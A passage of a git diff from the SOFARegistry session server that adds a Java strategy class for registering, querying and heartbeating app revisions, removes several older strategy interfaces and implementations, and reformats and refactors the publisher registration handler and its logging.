services); + + /** + * query appRevision + * + * @param revisions + * @return + */ + GetRevisionsResponse queryRevision(List revisions); + + /** + * revision heartbeat + * + * @param revisions + * @return + */ + MetaHeartbeatResponse heartbeat(List revisions); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DataChangeRequestHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DataChangeRequestHandlerStrategy.java deleted file mode 100644 index 3b5420455..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DataChangeRequestHandlerStrategy.java +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy; - -import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public interface DataChangeRequestHandlerStrategy { - void doFireChangFetch(DataChangeRequest dataChangeRequestExist); -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DefaultAppRevisionHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DefaultAppRevisionHandlerStrategy.java new file mode 100644 index 000000000..824fa295b --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/DefaultAppRevisionHandlerStrategy.java @@ -0,0 +1,153 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.strategy; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.client.pb.AppList; +import com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse; +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse; +import com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.session.converter.pb.AppRevisionConvertor; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionCacheRegistry; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionHeartbeatRegistry; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +public class DefaultAppRevisionHandlerStrategy implements AppRevisionHandlerStrategy { + + private static final Logger LOG = + LoggerFactory.getLogger(DefaultAppRevisionHandlerStrategy.class); + + @Autowired private AppRevisionCacheRegistry appRevisionCacheService; + + @Autowired private AppRevisionHeartbeatRegistry appRevisionHeartbeatRegistry; + + @Override + public void handleAppRevisionRegister(AppRevision appRevision, RegisterResponse response) { + try { + validate(appRevision); + appRevisionCacheService.register(appRevision); + response.setSuccess(true); + response.setMessage("app revision register success!"); + } catch (Throwable e) { + response.setSuccess(false); + String msg = StringFormatter.format("app revision register failed! {}", e.getMessage()); + response.setMessage(msg); + LOG.error(msg, e); + } + } + + @Override + public ServiceAppMappingResponse queryApps(List services) { + ParaCheckUtil.checkNotEmpty(services, "services"); + ServiceAppMappingResponse.Builder builder = ServiceAppMappingResponse.newBuilder(); + + int statusCode = ValueConstants.METADATA_STATUS_PROCESS_SUCCESS; + try { + for (String service : services) { + InterfaceMapping appNames = appRevisionCacheService.getAppNames(service); + AppList.Builder build = AppList.newBuilder().addAllApps(appNames.getApps()); + build.setVersion(appNames.getNanosVersion()); + builder.putServiceAppMapping(service, build.build()); + } + } catch (Throwable e) { + statusCode = ValueConstants.METADATA_STATUS_PROCESS_ERROR; + String msg = + StringFormatter.format( + "query apps by services error. service: {}, {}", services, e.getMessage()); + builder.setMessage(msg); + LOG.error(msg, e); + } + builder.setStatusCode(statusCode); + return builder.build(); + } + + @Override + public GetRevisionsResponse queryRevision(List revisions) { + ParaCheckUtil.checkNotEmpty(revisions, "revisions"); + GetRevisionsResponse.Builder builder = GetRevisionsResponse.newBuilder(); + int statusCode = ValueConstants.METADATA_STATUS_PROCESS_SUCCESS; + String queryRevision = null; + try { + for (String revision : revisions) { + queryRevision = revision; + AppRevision appRevision; + try { + appRevision = appRevisionCacheService.getRevision(revision); + } catch (Throwable e) { + LOG.error("query revision {} error", queryRevision, e); + continue; + } + if (appRevision == null) { + statusCode = ValueConstants.METADATA_STATUS_DATA_NOT_FOUND; + String msg = StringFormatter.format("query revision not found, {}", revision); + builder.setMessage(msg); + LOG.error(msg); + } else { + builder.putRevisions(revision, AppRevisionConvertor.convert2Pb(appRevision)); + } + } + } catch (Throwable e) { + statusCode = ValueConstants.METADATA_STATUS_PROCESS_ERROR; + String msg = + StringFormatter.format("query revision {} error : {}", queryRevision, e.getMessage()); + builder.setMessage(msg); + LOG.error(msg, e); + } + builder.setStatusCode(statusCode); + return builder.build(); + } + + @Override + public MetaHeartbeatResponse heartbeat(List revisions) { + ParaCheckUtil.checkNotEmpty(revisions, "revisions"); + MetaHeartbeatResponse.Builder builder = MetaHeartbeatResponse.newBuilder(); + int statusCode = ValueConstants.METADATA_STATUS_PROCESS_SUCCESS; + for (String revision : revisions) { + // avoid the error break the heartbeat of next revisions + try { + boolean success = appRevisionHeartbeatRegistry.heartbeat(revision); + if (!success) { + statusCode = ValueConstants.METADATA_STATUS_DATA_NOT_FOUND; + String msg = StringFormatter.format("heartbeat revision not found, {}", revision); + builder.setMessage(msg); + LOG.error(msg); + } + } catch (Throwable e) { + statusCode = ValueConstants.METADATA_STATUS_PROCESS_ERROR; + String msg = + StringFormatter.format("revisions {} heartbeat error: {}", revision, e.getMessage()); + builder.setMessage(msg); + LOG.error(msg, e); + } + } + builder.setStatusCode(statusCode); + return builder.build(); + } + + private void validate(AppRevision appRevision) { + ParaCheckUtil.checkNotBlank(appRevision.getAppName(), "appRevision.appName"); + ParaCheckUtil.checkNotBlank(appRevision.getRevision(), "appRevision.revision"); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/PublisherHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/PublisherHandlerStrategy.java index 09eaeaa7c..88821cd9a 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/PublisherHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/PublisherHandlerStrategy.java @@ -25,6 +25,6 @@ * @since 2019/2/15 */ public interface PublisherHandlerStrategy { - void handlePublisherRegister(Channel channel, PublisherRegister publisherRegister, - RegisterResponse registerResponse); + void handlePublisherRegister( + Channel channel, PublisherRegister publisherRegister, RegisterResponse registerResponse); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedConfigDataPushTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedConfigDataPushTaskStrategy.java index f87fdf2b8..24cfc3cd7 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedConfigDataPushTaskStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedConfigDataPushTaskStrategy.java @@ -24,5 +24,5 @@ * @since 2019/1/4 */ public interface ReceivedConfigDataPushTaskStrategy { - Object convert2PushData(ReceivedConfigData receivedConfigData, URL url); + Object convert2PushData(ReceivedConfigData receivedConfigData, URL url); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedDataMultiPushTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedDataMultiPushTaskStrategy.java deleted file mode 100644 index f6ce3089b..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/ReceivedDataMultiPushTaskStrategy.java +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy; - -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; - -/** - * @author xuanbei - * @since 2019/1/4 - */ -public interface ReceivedDataMultiPushTaskStrategy { - Object convert2PushData(ReceivedData receivedData, URL url); -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SessionRegistryStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SessionRegistryStrategy.java index 65f79cb29..2ab2cc1e3 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SessionRegistryStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SessionRegistryStrategy.java @@ -20,24 +20,21 @@ import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.common.model.store.Watcher; -import java.util.Map; - /** * @author xuanbei * @since 2019/2/15 */ public interface SessionRegistryStrategy { - void doFetchChangDataProcess(Map> dataInfoIdVersions); - void afterPublisherRegister(Publisher publisher); + void afterPublisherRegister(Publisher publisher); - void afterSubscriberRegister(Subscriber subscriber); + void afterSubscriberRegister(Subscriber subscriber); - void afterWatcherRegister(Watcher watcher); + void afterWatcherRegister(Watcher watcher); - void afterPublisherUnRegister(Publisher publisher); + void afterPublisherUnRegister(Publisher publisher); - void afterSubscriberUnRegister(Subscriber subscriber); + void afterSubscriberUnRegister(Subscriber subscriber); - void afterWatcherUnRegister(Watcher watcher); + void afterWatcherUnRegister(Watcher watcher); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberHandlerStrategy.java index ebaa36d68..35c0bcd07 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberHandlerStrategy.java @@ -25,6 +25,6 @@ * @since 2019/2/15 */ public interface SubscriberHandlerStrategy { - void handleSubscriberRegister(Channel channel, SubscriberRegister subscriberRegister, - RegisterResponse registerResponse); + void handleSubscriberRegister( + Channel channel, SubscriberRegister subscriberRegister, RegisterResponse registerResponse); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberMultiFetchTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberMultiFetchTaskStrategy.java deleted file mode 100644 index 8076452b5..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberMultiFetchTaskStrategy.java +++ /dev/null @@ -1,35 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy; - -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.util.Collection; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public interface SubscriberMultiFetchTaskStrategy { - void doSubscriberMultiFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - CacheService sessionCacheService, String fetchDataInfoId, - Collection subscribers); -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberRegisterFetchTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberRegisterFetchTaskStrategy.java deleted file mode 100644 index bd3d166b6..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SubscriberRegisterFetchTaskStrategy.java +++ /dev/null @@ -1,34 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy; - -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public interface SubscriberRegisterFetchTaskStrategy { - void doSubscriberRegisterFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - DataNodeService dataNodeService, - CacheService sessionCacheService, Subscriber subscriber); -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SyncConfigHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SyncConfigHandlerStrategy.java index a806c0143..d8862f4e7 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SyncConfigHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/SyncConfigHandlerStrategy.java @@ -23,5 +23,5 @@ * @since 2019/2/15 */ public interface SyncConfigHandlerStrategy { - void handleSyncConfigResponse(SyncConfigResponse syncConfigResponse); + void handleSyncConfigResponse(SyncConfigResponse syncConfigResponse); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/TaskMergeProcessorStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/TaskMergeProcessorStrategy.java deleted file mode 100644 index 52c2879dd..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/TaskMergeProcessorStrategy.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy; - -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.concurrent.atomic.AtomicInteger; - -/** - * - * @author shangyu.wh - * @version $Id: TaskMergeProcessorStrategy.java, v 0.1 2018-12-19 12:03 shangyu.wh Exp $ - */ -public interface TaskMergeProcessorStrategy { - - void init(T pushTaskSender); - - void handleEvent(TaskEvent event); - - AtomicInteger getPutTaskSize(); - - AtomicInteger getOverrideTaskSize(); - - AtomicInteger getSendTaskSize(); - - Integer getPendingTaskSize(); -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/WatcherHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/WatcherHandlerStrategy.java index ff11fb645..23d99a243 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/WatcherHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/WatcherHandlerStrategy.java @@ -25,6 +25,8 @@ * @since 2019/2/15 */ public interface WatcherHandlerStrategy { - void handleConfiguratorRegister(Channel channel, ConfiguratorRegister configuratorRegister, - RegisterResponse registerResponse); + void handleConfiguratorRegister( + Channel channel, + ConfiguratorRegister configuratorRegister, + RegisterResponse registerResponse); } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultDataChangeRequestHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultDataChangeRequestHandlerStrategy.java deleted file mode 100644 index 76c498598..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultDataChangeRequestHandlerStrategy.java +++ /dev/null @@ -1,46 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy.impl; - -import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.remoting.handler.DataChangeRequestHandler; -import com.alipay.sofa.registry.server.session.strategy.DataChangeRequestHandlerStrategy; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DefaultDataChangeRequestHandlerStrategy implements DataChangeRequestHandlerStrategy { - private static final Logger taskLogger = LoggerFactory.getLogger( - DataChangeRequestHandler.class, "[Task]"); - - @Autowired - private TaskListenerManager taskListenerManager; - - @Override - public void doFireChangFetch(DataChangeRequest dataChangeRequest) { - TaskEvent taskEvent = new TaskEvent(dataChangeRequest.getDataInfoId(), - TaskEvent.TaskType.DATA_CHANGE_FETCH_CLOUD_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPublisherHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPublisherHandlerStrategy.java index 4307f3859..7cf8ac999 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPublisherHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPublisherHandlerStrategy.java @@ -16,6 +16,8 @@ */ package com.alipay.sofa.registry.server.session.strategy.impl; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; + import com.alipay.sofa.registry.common.model.constants.ValueConstants; import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.common.model.store.URL; @@ -27,59 +29,92 @@ import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.server.session.converter.PublisherConverter; import com.alipay.sofa.registry.server.session.registry.Registry; -import com.alipay.sofa.registry.server.session.remoting.handler.PublisherHandler; import com.alipay.sofa.registry.server.session.strategy.PublisherHandlerStrategy; import org.apache.commons.lang.StringUtils; import org.springframework.beans.factory.annotation.Autowired; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; - /** * @author xuanbei * @since 2019/2/15 */ public class DefaultPublisherHandlerStrategy implements PublisherHandlerStrategy { - private static final Logger LOGGER = LoggerFactory.getLogger(PublisherHandler.class); + private static final Logger PUB_LOGGER = LoggerFactory.getLogger("PUB-RECEIVE"); + @Autowired private Registry sessionRegistry; - @Autowired - private Registry sessionRegistry; + @Override + public void handlePublisherRegister( + Channel channel, PublisherRegister publisherRegister, RegisterResponse registerResponse) { + Publisher publisher = null; + try { + String ip = channel.getRemoteAddress().getAddress().getHostAddress(); + int port = channel.getRemoteAddress().getPort(); + publisherRegister.setIp(ip); + publisherRegister.setPort(port); - @Override - public void handlePublisherRegister(Channel channel, PublisherRegister publisherRegister, - RegisterResponse registerResponse) { - try { - String ip = channel.getRemoteAddress().getAddress().getHostAddress(); - int port = channel.getRemoteAddress().getPort(); - publisherRegister.setIp(ip); - publisherRegister.setPort(port); + if (StringUtils.isBlank(publisherRegister.getZone())) { + publisherRegister.setZone(ValueConstants.DEFAULT_ZONE); + } - if (StringUtils.isBlank(publisherRegister.getZone())) { - publisherRegister.setZone(ValueConstants.DEFAULT_ZONE); - } + if (StringUtils.isBlank(publisherRegister.getInstanceId())) { + publisherRegister.setInstanceId(DEFAULT_INSTANCE_ID); + } - if (StringUtils.isBlank(publisherRegister.getInstanceId())) { - publisherRegister.setInstanceId(DEFAULT_INSTANCE_ID); - } + publisher = PublisherConverter.convert(publisherRegister); + publisher.setProcessId(ip + ":" + port); - Publisher publisher = PublisherConverter.convert(publisherRegister); - publisher.setProcessId(ip + ":" + port); - publisher.setSourceAddress(new URL(channel.getRemoteAddress())); - if (EventTypeConstants.REGISTER.equals(publisherRegister.getEventType())) { - sessionRegistry.register(publisher); - } else if (EventTypeConstants.UNREGISTER.equals(publisherRegister.getEventType())) { - sessionRegistry.unRegister(publisher); - } - registerResponse.setSuccess(true); - registerResponse.setVersion(publisher.getVersion()); - registerResponse.setRegistId(publisherRegister.getRegistId()); - registerResponse.setMessage("Publisher register success!"); - LOGGER.info("Publisher register success!Type:{} Info:{}", - publisherRegister.getEventType(), publisher); - } catch (Exception e) { - LOGGER.error("Publisher register error!Type {}", publisherRegister.getEventType(), e); - registerResponse.setSuccess(false); - registerResponse.setMessage("Publisher register failed!Type:" - + publisherRegister.getEventType()); - } + handle(publisher, channel, publisherRegister, registerResponse); + } catch (Throwable e) { + handleError(publisherRegister, publisher, registerResponse, e); } + } + + protected void handle( + Publisher publisher, + Channel channel, + PublisherRegister publisherRegister, + RegisterResponse registerResponse) { + publisher.setSourceAddress(new URL(channel.getRemoteAddress())); + publisher.setTargetAddress(new URL(channel.getLocalAddress())); + final String eventType = publisherRegister.getEventType(); + if (EventTypeConstants.REGISTER.equals(eventType)) { + sessionRegistry.register(publisher); + } else if (EventTypeConstants.UNREGISTER.equals(eventType)) { + sessionRegistry.unRegister(publisher); + } else { + RegisterLogs.REGISTER_LOGGER.warn("unsupported publisher.eventType:{}", eventType); + } + registerResponse.setSuccess(true); + registerResponse.setVersion(publisher.getVersion()); + registerResponse.setRegistId(publisherRegister.getRegistId()); + registerResponse.setMessage("Publisher register success!"); + log(true, publisherRegister, publisher); + } + + private void log(boolean success, PublisherRegister publisherRegister, Publisher publisher) { + // [Y|N],[R|U|N],app,zone,dataInfoId,registerId,version,registerTimestamp,clientVersion,clientIp,clientPort + PUB_LOGGER.info( + "{},{},{},{},{},{},{},{},{},{},{},{},{}", + success ? 'Y' : 'N', + EventTypeConstants.getEventTypeFlag(publisherRegister.getEventType()), + publisherRegister.getAppName(), + publisherRegister.getZone(), + publisherRegister.getDataId(), + publisherRegister.getGroup(), + publisherRegister.getInstanceId(), + publisherRegister.getRegistId(), + publisherRegister.getVersion(), + publisher == null ? "" : publisher.getRegisterTimestamp(), + publisher == null ? "" : publisher.getClientVersion(), + publisherRegister.getIp(), + publisherRegister.getPort()); + } + + protected void handleError( + PublisherRegister publisherRegister, + Publisher publisher, + RegisterResponse registerResponse, + Throwable e) { + log(false, publisherRegister, publisher); + RegisterLogs.logError(publisherRegister, "Publisher", registerResponse, e); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPushTaskMergeProcessor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPushTaskMergeProcessor.java deleted file mode 100644 index 07fa252e5..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultPushTaskMergeProcessor.java +++ /dev/null @@ -1,65 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy.impl; - -import com.alipay.sofa.registry.server.session.listener.PushTaskSender; -import com.alipay.sofa.registry.server.session.strategy.TaskMergeProcessorStrategy; -import com.alipay.sofa.registry.task.listener.TaskEvent; - -import java.util.concurrent.atomic.AtomicInteger; - -/** - * - * @author shangyu.wh - * @version $Id: TaskMergeUtil.java, v 0.1 2018-12-10 18:35 shangyu.wh Exp $ - */ -public class DefaultPushTaskMergeProcessor implements - TaskMergeProcessorStrategy { - - private T pushTaskSender; - - @Override - public void init(T pushTaskSender) { - this.pushTaskSender = pushTaskSender; - } - - @Override - public void handleEvent(TaskEvent event) { - pushTaskSender.executePushAsync(event); - } - - @Override - public AtomicInteger getPutTaskSize() { - return null; - } - - @Override - public AtomicInteger getOverrideTaskSize() { - return null; - } - - @Override - public AtomicInteger getSendTaskSize() { - return null; - } - - @Override - public Integer getPendingTaskSize() { - return null; - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedConfigDataPushTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedConfigDataPushTaskStrategy.java index 73468fa4e..1c191021e 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedConfigDataPushTaskStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedConfigDataPushTaskStrategy.java @@ -18,16 +18,20 @@ import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.core.model.ReceivedConfigData; +import com.alipay.sofa.registry.server.session.converter.pb.ReceivedDataConvertor; import com.alipay.sofa.registry.server.session.strategy.ReceivedConfigDataPushTaskStrategy; /** * @author xuanbei * @since 2019/1/4 */ -public class DefaultReceivedConfigDataPushTaskStrategy implements - ReceivedConfigDataPushTaskStrategy { - @Override - public Object convert2PushData(ReceivedConfigData receivedConfigData, URL url) { - return receivedConfigData; +public class DefaultReceivedConfigDataPushTaskStrategy + implements ReceivedConfigDataPushTaskStrategy { + @Override + public Object convert2PushData(ReceivedConfigData receivedConfigData, URL url) { + if (url.getSerializerIndex() != null && URL.PROTOBUF == url.getSerializerIndex()) { + return ReceivedDataConvertor.convert2Pb(receivedConfigData); } + return receivedConfigData; + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedDataMultiPushTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedDataMultiPushTaskStrategy.java deleted file mode 100644 index 8c5fa3f4e..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultReceivedDataMultiPushTaskStrategy.java +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License 